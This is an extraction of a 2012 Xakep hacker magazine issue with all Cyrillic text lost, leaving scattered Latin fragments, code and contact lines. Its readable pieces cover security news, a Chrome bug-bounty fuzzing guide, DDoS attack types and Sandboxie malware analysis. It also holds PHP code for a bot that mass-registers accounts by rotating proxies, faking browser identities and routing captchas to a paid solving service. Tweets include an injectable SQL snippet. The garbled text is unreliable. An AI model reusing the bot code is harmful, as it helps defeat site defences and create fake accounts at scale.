
-

030

WWW.XAKEP.RU

02 (157) 2012

MONGODB

: 230 .
024

DDOS

HIGHLOAD LAB
040

CHROME
$270.000

GOOGLE
.
,
GOOGLE CHROME.

ANDROID

018

082

:
1986-2011

CODING
ALEKSANDR-EHKKERT@RAMBLER.RU

Intro

nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)


PC_ZONE UNITS

UNIXOID SYN/ACK
MALWARE

PR-

step (step@real.xakep.ru)
(magg@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(grigorieva@glc.ru)

DVD

Unix-
Security-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

ART
-

(alik@glc.ru)


PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906




-

DDOS



.
- QRATOR,
- .
: 100 100%
.
,
.

Highload Lab, , . ,
- -
. , :
,
.
:
- : ,
. :
DDoS $50 , DDoS' $1500. ,
: 50
, $160 .
: ,
,
$160
. DDoS
:(.

.: (495) 935-7034, : (495) 545-0906


TECHNOLOGY

(filatova@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)

(polikarpova@glc.ru)
( )
(tatarenkova@glc.ru)
(gospodinova@glc.ru)

(dubrovskaya@glc.ru)
-
(bulanova@glc.ru)

(korenfeld@glc.ru)

(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)

:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002
Zapolex, . 219 833 .
.
. ,
, . .
. : content@glc.ru.
, , 2012

nikitozz, . .
shop.glc.ru/xakep
vkontakte.ru/xakep_mag


Content


, .

010

HEADER
004
011

MEGANEWS

hacker tweets
-

016
017



Proof-of-concept
Excel

COVERSTORY

024

AntiDDoS
Highload Lab

DDoS'.

COVERSTORY

COVERSTORY

018

030


Google Chrome

-

058

104

PCZONE
036

040
044


Sandboxie

Android x86
Android
?

UNIXOID
104

110

SYN/ACK

116
048
052
058
064
070

Easy-Hack



MongoDB
NoSQL
: ?
Remote Control System
X-Tools

072

ZeroNights 2011

-

122
126

132
136

080
082

088

094
100

C/C++


HOW-TO: PE-


Sandy Bridge
AMD A75
Samsung RF712-S01
!

138

. !


VBR-
, BOOT-


Linux-


Windows Server 8
IT-
IDS/IPS

FERRUM

MALWARE
074

open source 2011


open source


OpenSSL OpenSSH,

142
143

116

FAQ UNITED
FAQ

8.5
WWW2
web-

MEGANEWS

21
( ) Windows 8,
Microsoft.

Marriott
400 . 1
.
,

, .

, , ,
. ,
?
, 26 ,
. Marriott ( , ,
) .
. .
Marriott, , IT- !
, Marriott
. , HR, e-mail . ,
, ,
. , ,
. , , .
, .

45 /
DDOS-, Prolexic.

,
DDoS .


Walt Disney
Apple

2670
$375 .

GOOGLE+
:
.
,
.

,
Crypteks,
.
,

. ,

, 26 .
12 ,
.
,
,
256- AES-.
, .
Crypteks
24 / 10 /.
. Crypteks USB 8
130 , 16 160 .
4 , , .

MCAFEE ANDROID
.
,
Android 37%

2011 .

MYSQL.COM SQL, D35M0ND142.


, ,
.


- MICROSOFT OFFICE 15 , 2012-.

DNS-
OPENDNS
MAN-IN-THE-MIDDLE

DNSSEC
,

DNS. DNSCrypt


DNS-

OpenDNS (
,
OpenDNS).

OpenDNS DNSCrypt ,
DNS (man-in-the-middle,
).
DNS. SSL
HTTP-. DNSCrypt DNSSEC,
, , .
DNSCurv,
DNS, DNSCrypt ,
, . DNSCrypt
DNS DNS-. DNSCrypt
Curve25519 ( )
RSA. DNSCrypt, , , OpenBSD, NetBSD, Dragonfly
BSD, FreeBSD, Linux Mac OS X. DNSCrypt , , Unbound, PowerDNS dnscache.
, , Mac OS X.

,
SAMSUNG 2012


10"

CARRIERIQ

-


- Android-
. ,
androidsecuritytest.com. ,
CarrierIQ , ,

. ,

Android, RIM Nokia ( ).
, CarrierIQ
- (Cease&Desist).
, ( , ),
.
Electronic Frontier
Foundation, ,
,
. CarrierIQ .

,
. EFF
,
.
,
, .
.
YouTube (youtu.be/T17XQI_AYNo),
,
. ,
CarrierIQ
SMS,
. Wi-Fi-
Google. , CarrierIQ
.
(hello world), , SSL. ,

SMSNotify, CarrierIQ?
,
Wi-Fi- , HTTPS?, .
. ,
, CarrierIQ , ,
, 141 ,
. Apple ,
CarrierIQ iOS.
, ,
, , . , , , ,
. ,
CarrierIQ,
CarrierIQ, .


MICROSOFT, DVD 53 % , 44 % 43 % .


2011
BIT9

SOPA

RUTRACKER
SOPA (STOP ONLINE
PIRACY ACT)



Stop Online Piracy Act
(SOPA),

.

,

,
(,
AdSense),
ISP . , SOPA
DMCA,
,
,
. MPAA RIAA , SOPA
. - ( rutracker.org
demonoid.me) -. ,
,
.
,


. -,
Google, Yahoo, Facebook , ,
.

,
Bit9,
:
1. Samsung Galaxy
Mini.
2. HTC Desire.
3. Sony Ericsson
Xperia X10.
4. Sanyo Zio.
5. HTC Wildfire.
6. Samsung Epic 4G.
7. LG Optimus S.
8. Samsung Galaxy S.
9. Motorola Droid X.
10. LG Optimus One.
11. Motorola Droid 2.
12. HTC Evo 4G.

Bit9
. ,
, .
,
Android. 13 iPhone 4 .
black list , ,
, .
Samsung Galaxy Mini,
HTC
Desire Sony Ericsson Xperia X10 .
Android
? Bit9 , 56 % (!)
Android, ,
. , Samsung, HTC, Motorola
LG, .
Android.


EDIFIER R2500
Edifier International Ltd.
2.0. Edifier R2500.
.
USB , SD , FM- AUX
.
50 .
5 - , 1- 2 (
). Edifier R2500
, .

ID
SOFTWAREI
Doom III .
.


:
crypto-class.org.

, tcpcrypt.


APPLE, iTunes, 2008 FinFisher.

?


,
, smart
grid TCP/IP-
. 1015,
.
Stuxnet , , .
. , , , ?
?
,
.
.
, -
.

SCADA- 1998 , .
2011 . ,
SCADA- Curran-GardnerWaterDistrict
( ),
.
IP-. . , SCADA
- .
, ,
SCADA-
,

. -

.

pr0f, ,
SCADA- (). . , .

.
,
.
IP-
, .
.
,
. , - . Pr0f
, SCADA-

. ,
?



Pure System,
.
:
1) ;
2) ;
3) ;
4) .
Pure System,
Yves Rocher , -



.
.
, , ,


.
.


(@asintsov)

#hacker tweets
@mckt_

@bobuk

:
.

if(user.followers == 0 && user.following > 50 && tweet.mentions > 3 && tweet.has_link){tweet.is_probably_spam}

@d0znpp

SQLi : $id=$_GET['id']; $o=new Object($id); SELECT ... WHERE id=$id;

@mikko:


Wi-Fi '5.99 /'. , ,
, .

@Dabeaz:

.
,


.

@dlitchfield:

11gR2
secalert_us@
oracle.com
24 ... ? ;-)

@ABazhanyuk
FreeBSD ftpd and ProFTPd on

FreeBSD Remote r00t Exploit:


http://www.exploit-db.com/exploits/18181/


Oracle.
, ,
, ,
0day (, BlackHat)

@kevinmitnick:

GPS
spoofing .
, Stuxnet?

@ortegaalfredo:

,

, ,
.

@toxo4ka:

@alexmImmunity:
@thegrugq:

:
?.
,
, : 1)
2)
escape-

.
Perl,
.

@DeathStarPR:
@cesarcer:

@thegrugq, ,
.
calc.exe

Perl
sqlninja.


.
.
.

Siri,
.
. , , Siri!

.
@d0znpp

@sschillace:

- SOPA 5
,
, ...
:

SOPA Stop Online Piracy Act.


,
.


@L4merS3C:

: ,
IPS, WAF, NAC. , ,
, , .

@aaronportnoy:

SCADA, ,

.

, , ,
?debug=true. LOL #-

@hdmoore:

BSD Telnet:
http://bit.ly/s8yy9X <
FreeBSD 5.3 -> 8.2 Red Hat Enterprise
Linux 3.


33 Android.SmsSend Android Market.

LINUX MINT 12

HDCP -

LINUX-
,
Mint
32- 64
x86-

: 512
( 1
), 5
,

800x600
. Linux Mint 12
.

Linux Mint
,
Ubuntu.
Linux Mint 12, Ubuntu 11.10 Lisa,
Gnome 3,
. ,
Gnome 2, Gnome 3.

.
Mint Linux (linuxmint.com), :).
, , Linux Mint
, , Linux DistroWatch, , Linux Mint, . , Unity,
Ubuntu Gnome KDE.
-, ,
.
, Gnome Gnome 3,
Linux Mint Mint Gnome
Shell Extensions Linux Mint 12
,
.

99 188

.


COMSCORE, 1217


25 % .



e-mail.
..

INTEL
HDCP

, HDCP,
Intel - ,
HDMI, .
- HDCP,
Intel .
Intel ,
, HDCP-
. , Intel ,
.

() , Intel . :)
,
Digilent Atlys
(FPGA), HDMI RS232
.
$200.

ReConFig 2011.

,
, 1 500

. .

INTEL 120 ,
x86
Atom Android 4.0.


16 QUAKE , , .

EZ-ROBOT

VIII

,
2011 (premiaruneta.ru).
VIII :
35 .
.
:
( i-Russia.ru);
( www.vtbrussia.ru);
(www.infosud.ru).
.

, , :
Google (
);
( );
- (www.NetPolice.ru).

:
.;
.;
-..
:
- (chaskor.ru);
;
(- www.NOW.ru);
(rg.ru).
:
- (caramba.tv);
. (www.budist.ru);
(www.nalogia.ru).
:
Mail.ru Group ( Russian Code Cup);
-.;
.
(gramota.tv);
LiveLib.ru.
:
- OZON.travel;
AMF.ru;
(vitaportal.ru).
.
-
2011.
: : World
of Tanks. ,
, narod.premiaruneta.ru.
:
1- ( );
Free-lance.ru;
BFM.ru.
:
-
(SoftKey.ru);
();
(habrahabr.ru);
;
.

,
,
,
iRobot Roomba

,
,

,

ez-robot.com.


EZ-Robot Complete Kit EZ-Robot. , $243,
. , , , ,
.
,
( GUI,
, ). , ,
, . HTTP--
, iPhone, Android .
, , . ,
.

PHOENIX TECHNOLOGIES WINDOWS 8

SCT 2.2
60
,

,

. .

13,2 Maple Story. .

0DAY
ADOBE

! GOOGLE
BING

P2P- YACY

:
YaCy (yacy.net),
Google, Yahoo, Bing
.
, P2P,
YaCy
, , . ,
, . Freeworld , GNU/Linux, Windows MacOS. , YaCy
Diaspora,

Facebook, Google+ . . P2P-
.
,
. YaCy , ,
. YaCy Free Software Foundation Europe (FSFE).

Adobe

U3D memory
corruption
vulnerability.
U3D

Universal 3D

.
,
PDF-

U3D,

.

Adobe Reader Acrobat! ,


. Adobe Systems
. Adobe Reader X ( 10.1.1 ) Windows Macintosh,
Adobe Reader 9.4.6 Unix, Adobe Acrobat X ( 10.1.1
) Windows Macintosh. -
, , . ,
0day. Adobe, . , ,
: Adobe ,
Lockheed Martin MITRE.
, ,
MITRE, Defense Security
Information Exchange , . Reader
Acrobat 9 , Reader Acrobat 10 (
Mac OS X Unix) .

WEXLER.
BOOK T7005 7- LED . 8 ( 32
MicroSD) 2800
.
, , . DOC.
-,
WEXLER.BOOK T7005 .
720p.

G-.
3 990 .


GOOGLE ,

Android Market
.
Market

.

NOKIA -
MAIL.RU GROUP
.
27
Nokia Series 40.


26 % , .

WEBOS
HP
, HP .

webOS , , ,
. , , webOS
Amazon Oracle. ,

Palm Palm OS. , 2010 Palm HP 1,2
.
webOS. Hewlett-Packard
- .
webOS , HP. ,
, , . -,
Android. , ,
, webOS, GPL, BSD Microsoft
Shared Source - . TechCrunch
HP , ,
webOS. , 2013 , 2012-
HP Windows 8.
, , Hewlett-Packard
TouchPad.
eBay,
. ,
, , , , -
( )


HP


ENYO
webOS.

.
.
. HP TouchPad 16 ,
$99, 15 . TouchPad
32 $149
, , ,
25 .
7850 TouchPad. , , (, -
), $79. , eBay ,
PayPal .
, TouchPad HP, .


$5000, ,
,


HEADER



, ,
portable-, .
. ,
(portableapps.com/ru).
,
Cameyo (www.cameyo.com) portable-
. : ,
,
. . ,
:). ,
.
,
, , VirtualBox Cameyo .
,
Portable-VirtualBox
(www.vbox.me).
VirtualBox
, USB-. ,
AutoIt (
bit.ly/rQ0n7Z), - , ,
. - . , ( Portable-VirtualBox_v4.1.6-Starter_v6.4.8-Win_all.exe)
.
Portable-VirtualBox.exe.
, - (,
) . .
-

, , Save the state,


. . . z

portable-

VirtualBox


VirtualBox . ,
, USB- (
). Download
installation files of VirtualBox, (, Extract the files for 32-Bit system) ,
.
( VirtualBox.xml),
Portable-VirtualBox.exe . VirtualBox. -
.
VirtualBox,
.
USB, .
(),
. Settings
Network Start VirtualBox with network support.
Portable-VirtualBox . ,
, , .
VirtualBox. , ,
, :
Portable-VirtualBox.exe "leopard"


Proof-of-Concept
EXCEL

-, Excel?
.
, ,
. ,
, - (
), .
, Excel , ,
Office VBA-,
? - -.

?
PoC Excel TaskManager.xls. :
-,

Excel- ,
,
VBA (Visual Basic
). ,
: List processes ( )
Execute commands ( ). , ,

( , ID ,
, ,
, ,
32 64 ).
,
, , .

TaskManager.xls


Command
(,
t)
Execute commands. .
, ,
.
winlocker' -.

Private Declare Function OpenProcess Lib "kernel32.dll" ( _
    ByVal dwDesiredAccess As Long, _
    ByVal bInheritHandle As Boolean, _
    ByVal dwProcId As Long) As Long


. ,
:
Private Sub TerminateProcessByID(ByVal lProcessID As Long)
    Dim hProcess As Long

    ' Open the target process with only the right needed to terminate it
    hProcess = OpenProcess(PROCESS_TERMINATE, 0, lProcessID)
    If hProcess <> 0 Then
        TerminateProcess hProcess, 0
        CloseHandle hProcess
    End If
End Sub

?

VBA. WIN32-
.

DLL,
:

VBA

TaskManager.xls
32-, 62- ,
(
64- Office 2010) .
:
blog.didierstevens.com/2011/11/30/signedtaskmanager.
PoC,
. z


000, 00spersky Lab


(twitter.com/ax330d, onsec.ru)

COVERSTORY


Google
Chrome
WWW
bit.ly/rpBAH9
,

;
caniuse.com

;
bit.ly/taDA7s

Netscape;
bit.ly/alUyof Hall
of Fame;
bit.ly/kyBEkv
ASan;
bit.ly/oJnrhP

How Open
Should Open Source
Be?;
bit.ly/uQywEh

Grammar-Based
Interpreter Fuzz
Testing.

WWW


Chrome,


-

bug bounty,


.
Netscape
1995 , Mozilla
Google .
,
Google Chrome.

GOOGLE
,
, .
Google Vulnerability Reward
Program.
, Google
Chrome .
, Hall of Fame,
,
.
,
, , .
, 2010
,
: $500, $1000 $1337.
, , ,


$3133,7,
$1000 ( , ,
).
Chrome

Chris Evans. Adam Mein
. ,
,
, , Browser crash in
HTML5 speech UI (crbug.com/68666). ,



.
:). ,
wushi team509
500, 509 , - . Google
.

.


,
.

: , , , , .

HALL OF FAME

Google Security Hall of Fame
.

, 60
(
).
270
!

,
.

, ,
,
, .
, , ,

,

.
!
, - :
;
(
);

().

- , ,
. ,
, ,
, ,
,
-.
, ,
.
, -
.
, -
?


.

,
-
.
W3C, - ,

. , ,

. ,
.
. :-)
CSS 3, HTML 5, DOM,
SVG, Canvas, Audio/Video, WebGL, Drag'n'Drop,
. Chrome, ,
WebP.




,
, - ,
XML-.
, .

,
C++ ( ,
, ).
,
- ,
. ,
,
,
- ,
? ,

,
. .


?
, . , Mozilla Firefox
CVE-2010-0179, Firebug,
,
CVE-2010-3773. ,
, ,
, .
,
, ,
.


. - Mozilla Webkit
-
, ZDI,
.
.

-

.
,
, ,
public ,

. Chrome, ,
, .
Safari ,
,
.



,
.

.
,
.
, ,
, .
,
- ,
, .

,

.

.
, , , ,
. ,
,
,
, ,
.

, . ,
-
,
, ,

. ?
,
,
,
, .

CHROME
Chrome,
,

, Chrome




, .
.gclient,
:
"custom_deps" : {
  "src/third_party/asan":
    "http://src.chromium.org/svn/trunk/deps/third_party/asan",
},

, ASan. ASan
Clang (bit.ly/mf7cuG). ./build/
install-build-deps.sh.
,
.
,
:

AddressSanitizer

: Windows ( 32 ), Linux Mac.



: -
,
. ,
GNU C, (crbug.com/48733).
.
canary
, dev, beta stable (
stable, beta
dev). ,
,
15
. ,

, !
,
.
,
.
Google Chrome ASan.
ASan? Address
Sanitizer,
, Valgrind.
Valgrind.
, ASan .
use-after-free, overflow/underflow
, , . , ASan
, Valgrind.


malloc()/free() ,
.
, .
, .
, ,
.
Chrome
, heap buffer overflow, use-after-free - . ASan. .

-
,
. .
,
, Ubuntu 10.10, x64

# depot_tools must be on PATH for gclient
export PATH=$HOME/depot_tools:$PATH
cd src
# Paths to the bundled ASan-enabled Clang and its blacklist
ASAN=`pwd`/third_party/asan
ASAN_BIN=$ASAN/asan_clang_Linux/bin
BLACKLIST="-mllvm -asan-blacklist=$ASAN/asan_blacklist.txt"
CC="$ASAN_BIN/clang $BLACKLIST"
CXX="$ASAN_BIN/clang++ $BLACKLIST"
# Regenerate the build files with ASan enabled
GYP_DEFINES='asan=1 linux_use_tcmalloc=0 release_extra_cflags="-g -O1 -fno-inline-functions -fno-inline"' \
  gclient runhooks

:
make -j16 BUILDTYPE=Release CC="$CC" \
CXX="$CXX" CC.host="$CC" \
CXX.host="$CXX" LINK.host="$CXX" chrome


. , ,
,
50
, 12 , .

-5 GOOGLE CHROME

1. (54 )
2. MIAUBIZ (49 )
3. AKI HELIN (24 )
4. KUZCC (22 )
5. CHRISTIAN HOLLER (19 )

,
:
ASAN_OPTIONS=stats=1 out/Release/chrome --no-sandbox 2>&1 | \
  third_party/asan/scripts/asan_symbolize.py | c++filt

,
,
. ,
addr2line, ,

(
9 ). ,
,
:
out/Release/chrome --no-sandbox

, ,
.

,

(, , -

).

: cross_fuzz, ref_
fuzz, Canvas fuzzer Michal Zalewski, jsfunfuzz
Jesse Rudermann, BF Jeremy Brown.

: DOM, HTML, JavaScript,
canvas WebGL.


.
, jsfunfuzz.
,

.

Pwn2Own


WinDbg Stack overflow Chrome

.

./gclient sync.

.
,
bash-,
.
,
bit.ly/s9wt5F.
Open, ,
Closed, Chrome .
,

.
, ,
,
Chrome. ,
. Chrome
:
DoS use-after-free.
ASan, ,

, ?
, , Chrome. !
,
Proof-of-Concept. ,
.
,
.
, ,
:
DoS, OOM , Stack
exhaustion (,
).
,
use-after-free
. - DoS
,
Security (
).


, ,
, Aw,
Snap!. Chrome
,
. use-after-free,
, .
Valgrind ASan. ,
, ,
gdb WinDbg.
WinDbg .

RelaunchChromeBrowserWithNewCommandLineIfNeeded, , , :
!sym noisy
.reload /d /f /o

,
,
, .
. ,
, .
, , . ,
. ,
,
,
. , . ,
, . ,
,
. ,
. ,
, ,
- . , , ,
. ,
,
.
. Chris Rohlf
, ,
. ,
, , crbug.com/63866.
,
-
. .
,
,
, ,
. . ,
, ,
.
( merge) . , ,


,
, .
, -, , . ,
, . ,

,
.


, .
, ,

, ,
. ,
, , -
,
. ,
. , -
, reward-500.
(Boilerplate
text) ,
,
.
,
Chris Evans

,
,
Google. , . , , , ,
, -,
, - . , ,
PDF-,
.

, . . ,
,
, ,
Google. . -
,
.


, Google Chrome, Hall of Fame
.
- , . -
, ,
. , ,
Google Chrome. z

Vupen Google Chrome


COVER STORY

Anti

DDOS-
. , ,
DDoS, , .
: ,
1998-!
DDoS
IT Territory 2003 ,
. ,
DDoS
. , . - , ,
-,
, .
, .

.
, .
, ,
.
-.
-?
: -,
, . , ,
.
?
, , ,
, .


DDoS- Highload Lab

DDoS
DDOS- HIGHLOAD LAB
, , ,
.
DDoS- ,
, ,
.
.
,
. , -
, .
, ,
, .
:
, ,
. WMZ, ,
. $30100
. ,
, ,
24/7 .
, , ,
.
, $100 .
.
, .
,
,


,

-. , - .

, -
, - !
,
, ,
,
.

DDoS,
-
. DDoS-

,
.
DDoS , ,
. De facto
.
.
,
. , DDoS -
.

Slon.ru. , ,

. . ,
, . ,
,
application-. , ,
200270 .
DDoS- -
.
Lineage II.
,
.
ICQ - ,
, (!),
, , !
Lineage!
DDoS- ,
. , ,
.
-, , , ,
DDoS-. , , , ,
.

DDOS
? ,

.

- .
ICMP spoof, DNS amplification, TCP
SYN flood, TCP RST flood
.
, .
.
:
,
( /),
( ), ( TCP/IP).
.
? ,
. , , ,
( ).
- . , , .
,
,
EDGE, GPRS.
- ,
outflow .
.
, TCP/IP.
SYN-, RST-
FIN-way , , ,

, .

DNS amplification.
IDP based handshake,
N N
x K. IP-,
,
,
IP- .

. DNS
UDP 53, ,
.
, .

K ,
- . , , K
. NTP,
,


, , .

SYN-
TCP-.
, -, 1982 . ,
. . - SYN-
, , .
10 .

, ,
DNS
IP- ( ). ,
IP ,
,
, IP iptables
IP-, .



sequence- ( ,
,
)
. ,
. , , ,
, , . .

DNS, .
.
:
. .

, . TCP/IP-, ,
, ,
,
.
,
. .
DNS amplification
.
,
:
, - IP-.
?
56 clustery sort
. ,
.
, ,
. , - ,
, .
,
, 200
, get , ,

.

DDOS
.
.
, DDoS, ,

Qrator
. ?? !
, , ,
, .
,
.
.

.
. ,

.
,
- -.
,

. ,
, . .
, ,
, , , ,

- .
,
... , .
.

.

DDoS-. , .
, Cisco Guard
( ,
), .
, , false positive
, .
( ), , .


, , NAT,
,
.
.
, 30, 40 100
.
Cisco Guard :
,
,
, ,
.
, DDoS-
,
.
, .
,
: ,
, . Qrator
,
.
, ,
- . - .
Arbor,
10 . ,
... 10
/c .
: .

TCP- .
, -, . ,
- .
,
UDP ,
ICMP ICMP .
57
. , .
,
,
100
.
DDoS- ,
.
Qrator ( )
Arbor , .
BGP-AnyCast,
. public exchange
,
.
.
, -
.


. ,
. ,
.
, ,
BGP.
,

.

, .
TCP/IP, FreeBSD Linux
,
.
TCP/IP,

, TCP.

TCP/IP-,
,


, Linux.
,
,
.
TCP- TCP-, ,
,
\ .
6 .
.
, -.
, , ,
2008 (
highloadlab.ru).
, ,
.

DDoS,
Highload++ 2009 .
,

. , ,
.


DDoS
, .
, ,
.

.
,
:
1. . .
2. . .
HTTP-, .
, , JS-
.
3. . ,
, .
,
.
4. .
.
5. .

, ...

. ,
, 75 ,
. - .
,
,
.
, .
- Java-,
, cookies.
20- , , . , ,
,
LAMP Stack (Linux, Apache HTTP Server, MySQL
PHP). 2010
3040 .
2010- P2P. :

- , 1020 ,
.

,
, .
MinerBot,
BitCoin.
, ,
Cisco Arbor.
MinerBot,

, .
. 2009 ,
1500 ,
.

. ,
,
.

,
. ,
-
. ,

, , .

. .
-
.
, .
: Windows XP
SP1 IP-.
, - , -?
. ,
,

. ,
, ,
.
, .

. . :)
,


, ,
,
,
Windows-.

HIGHLOAD LAB
DDoS-
. ,
- .
, , ,
.
-
,
.

. , .
2008 . 2009
- ,

2010 . .
,
, . , ,
. . :)
: 2010 ,
10
, 12,5 . , ,
,
. , ...
- ,
. .
-. 1 , 2
6
. -.

. ,
.
: -
. ,
, ,
, Qrator.
,
.
12 .

. . , ,
.
, ,
,
( ).
, , ,
.
.
. - , .
,
, , . ,
, . .
Highloadlab .


: , .

. .
DDoS- 50100 ,
, ,
.
5000 .
, .
,
.
.
, New Times,
golos.org, , ,
Forbes, Public Post, ... ,
.
. .

.
,
,
, -
-.
, , , , ,

. .
, . z


DDoS
: -
, . DDoS-
Highloadlab.

DDoS-

DDoS- 2011

1861

1905

340

34

1 /


:
437
392

303
56 /

486 .

239 991

DDoS-?

87
22
85
103

89
52
85
DDoS



:)

143
107

* 2011


COVERSTORY

|qbz|



-

.

, ,
, .
,

.


.

- , , ,
- .
, ,
, ,
-.
. ,
,
cURL, -.
,
.
,
. , , .

DVD


,
.

,
IP- ,
.
,
c cURL:


curl_setopt($c, CURLOPT_PROXY, $proxy_address);

.
, ,
.
.
( , ,
).
:
, IP- . ,
, ,
cookie.
:
$cookie_session = array(
'BIRTHDAY='.rand(1,29).'-'.rand(1,12).'-'.rand(1960,1985),
'IS_18OLDER=1',
'LANG=en'
);

, ,
, . , , ,
e-mail, , .
, ,
, 20 . :)

- . . ,
, .
. , .
,
. , , .
Ajax, .
, . , ,
,
.

CAPTCHA'


.
, , , . ,
, .
,
.
, ( User-Agent)
,
.

-, . :
include('./useragents.lib.php');
$chosen_useragent = chooseBrowser();

, 150 . . ,
cookie. ,
, ,
(User-Agent),
, .
cURL cookie-,
, . -
, , ,
.


, , , . .
. ? ,
, , , .
, , ,
. ( -) . ,
,
, .
1 : 3, .
(
),
, , JavaScript-,
--, .
? 100 1000 , 1000
20 ,
.
?
, ,
. , , ,

( ).
(headers), , .
/
, ,
, . ,
. :
,
.

CAPTCHA
,
.
:
function loadIndex(){
global $chosen_useragent, $cookie_session;
$list = parseRequests(
file_get_contents('./index_map.txt'),
$chosen_useragent,
'Cookie: ' . implode('; ', $cookie_session));
$links = array(); $heads = array();
foreach ($list as $link => $head){
$links[] = $link;
$heads[] = $head;
}
$paged = cM($links, $heads, 1, 1);
}

HTTP-

, . .
LiveHTTPHeaders
Mozilla Firefox ( Opera Dragonfly )
,
.
, .
.
-
, ,
, () ,
(
,
).

$list = parseRequests(
file_get_contents('./index_map.txt'),
$chosen_useragent,
$cookie);

, .
curlMulti() .
,


, index_map.txt
, Firefox . , ,
, , ,
, , . .
.
- LiveHTTPHeaders ,

$paged = cM($links, $heads, 1, 1);

$paged = cM($links, $heads, 1, 1, 'captcha.php');


list($c_url, $sid) = explode('captcha_sid=', $links[11]);
return array(
'sid' => $sid,
'image' => base64_encode($paged[11])
);

, . $links[11]
$paged[11] 12- , , (
).
sid, .
.
antigate.com,
($1 1000 )
.
API- ,
, . :
$captcha = loadReg();


$local = md5($captcha['image']);
$write_c = fopen('./captchas/'.$local.'.jpg', 'wb');
fputs($write_c, base64_decode($captcha['image']));
fclose($write_c);
$cresult = recognize('./captchas/'.$local.
'.jpg', 'e12dc4858bac1f4ee338c577f9d300');

$cresult.


- , .
, .
:
1. ,
. ,
,
- (
) .
2. , ,
, , . , , 123@
. 234@., , ,
.
.
3. ,
. mailinator.net
, .
,
( !) . 11 .

.
? , ,
. ,
,
, -

PHP IMAP. ,
-,
, , . ,
.
:
function getMessage($login, $password){
$imap = imap_open(
'{mail.rambler.ru:110/pop3/notls}INBOX',
$login,
$password);
if ($imap){
$body = imap_qprint(
imap_body($imap, (imap_num_msg($imap) - 1)));
}
else{return false;}
return $body;
}

. , ,
, , .
, , .
:
$password = substr(md5(time()), 0, rand(6, 10)).rand(10,99);

, ,
LiveHTTPHeaders.
POST-, multipart/form-data.
POST- (CURLOPT_POST, CURLOPT_POSTFIELDS).
Content-Type , multipart/form-data boundaries.
-, MySQL, . , , -, . ?
, ,
. ,
,
. , , ,
.

. ,
:
$activation = getMessage($email_login, $email_passw);

,
.
( referer user-agent,
). , :
- ,
.

. , . ,
, , Ajax
.
cURL. .
? , ,
, sleep() ,

, ( ,
)
JavaScript, - . cron -
.

?
?
. , , .
, .
, -
, .
.
, , ,
, . , ,
,
,
. , ,
:).
,
. ,
: , , , , IP-, ,
. , .
. ,
, . z


, ,
. -, JavaScript',
, -, , ,
,
- .



, Facebook, YouTube ,

. JavaScript' ,
,
.



. ,
, ,
.
, ,
.


Preview

30 .
.

PCZONE
40

ANDROID PC

,
. , aircrack .
Windows
,
.
,
.
Android- , ,
, ?
?
.

PC ZONE

36


,
sandbox ,
.

72

ZERONIGHTS 2011
,
,
0day-
.


44

?
,
. :
GitHub, BitBucket, Assembla
SourceForge?

58

MONGODB
SQL

.
NoSQL.

MALWARE

74

. !
?
HIPS .

82


, ,
- MS-DOS .
26 .


PC ZONE

Gray Jack the Fixxxer


SANDBOXIE



:
(sandbox).


,
,
.
.


,
,
. ,
,
.
,
, ,
. ,
,
.

,


, . ,
,
,
.
, , :
Anubis (anubis.iseclab.org), CAMAS (camas.comodo.com/cgi-bin/submit),
ThreatExpert (www.threatexpert.com), ThreatTrack (www.threattrack.com).
,
:
.

WARNING




!

.

( ).
, , , .

( ).

(, ).
,
,
( ).
, -.



,
. .

,
. ,

,
,

.

.


,
Sandboxie.
-
(www.sandboxie.com).
.
,

. :
Sandboxie
user mode.
. ,

.
kernel mode, , .
Sandboxie
,
. , ,

, . ,
Pinch, ,
ftp ,
Sandboxie

Sandboxie

! ,
.

SANDBOXIE
Sandboxie .
, .
Sandboxie
.
.
.
, ,
,
.
,
, . :
1. , .
2.
/ .
, 1 2,
,

.
3. ,

.

, .
, , ,
,
. , ,
, .
4.


,
.



,
. , Sandboxie

.
. ,

.
,
.

Buster Sandbox Analyzer


:
API- .

.
.
( , VirusTotal ,
PEiD, ExeInfo ssdeep . .).

-

(,
Process Monitor) .
:
,
kernel mode ( ).
(
).
,
Sandboxie. Buster
Sandbox Analyzer , .

1. Buster Sandbox Analyzer (bsa.isoftware.nl).
2. SBIExtra (bit.ly/rDhDba). ,
:
;
;
BlockInput ( );
.
3. Antidel (bit.ly/upYAfY).
, .
, , , .
?

Sandboxie,
. ,
Sandboxie, Plugins .
: Buster Sandbox Analyzer

LOG_API*.dll,
. : Verbose
Standard. API, , ,
.
,
.
, ,
-
, Verbose.
.

, : LOG_API_VERBOSE.dll
, LAPD.dll.
Sandboxie
.

.
:
FileRootPath
[GlobalSettings]
,
,
.
FileRootPath=C:\Sandbox\%SANDBOX%.
[UserSettings_XXXXXXX] .
,
(
BSA). :
[BSA]
InjectDll=C:\Program Files\Sandboxie\Plugins\sbiextra.dll
InjectDll=C:\Program Files\Sandboxie\Plugins\antidel.dll
InjectDll=C:\Program Files\Sandboxie\Plugins\LAPD.dll
OpenWinClass=TFormBSA
Enabled=y
ConfigLevel=7
BoxNameTitle=n
BorderColor=#0000FF
NotifyInternetAccessDenied=y
Template=BlockPorts

, , .

!
, ,
.
, Sandboxie:
.
Buster Sandbox
Analyzer.
, bsa.exe Plugins.
Options Analysis mode
Manual Options Program
Options Windows Shell Integration Add
right-click action "Run BSA".
: .



. , : www.malwaredomainlist.com ,

. pp.exe
- .
,
, .
, ,
/ -
, .
?

Run BSA. Buster Sandbox
Analyzer.
Sandbox folder to check.
,
Sandboxie,
BSA,
FileRootPath=C:\Sandbox\%SANDBOX%,

PORTABLE-
, ,
- , . .
,
,
,
.
: tools.safezone.cc/gjf/Sandboxie-portable.zip.

start.cmd,
stop.cmd,

,
.

:
Sandboxie.ini.
template, Templates.


,
Sandboxie,
,

Templates.
,
- .
$(InstallDrive),
.
FileRootPath.
:
FileRootPath=$(InstallDrive)\Sandbox\%SANDBOX%

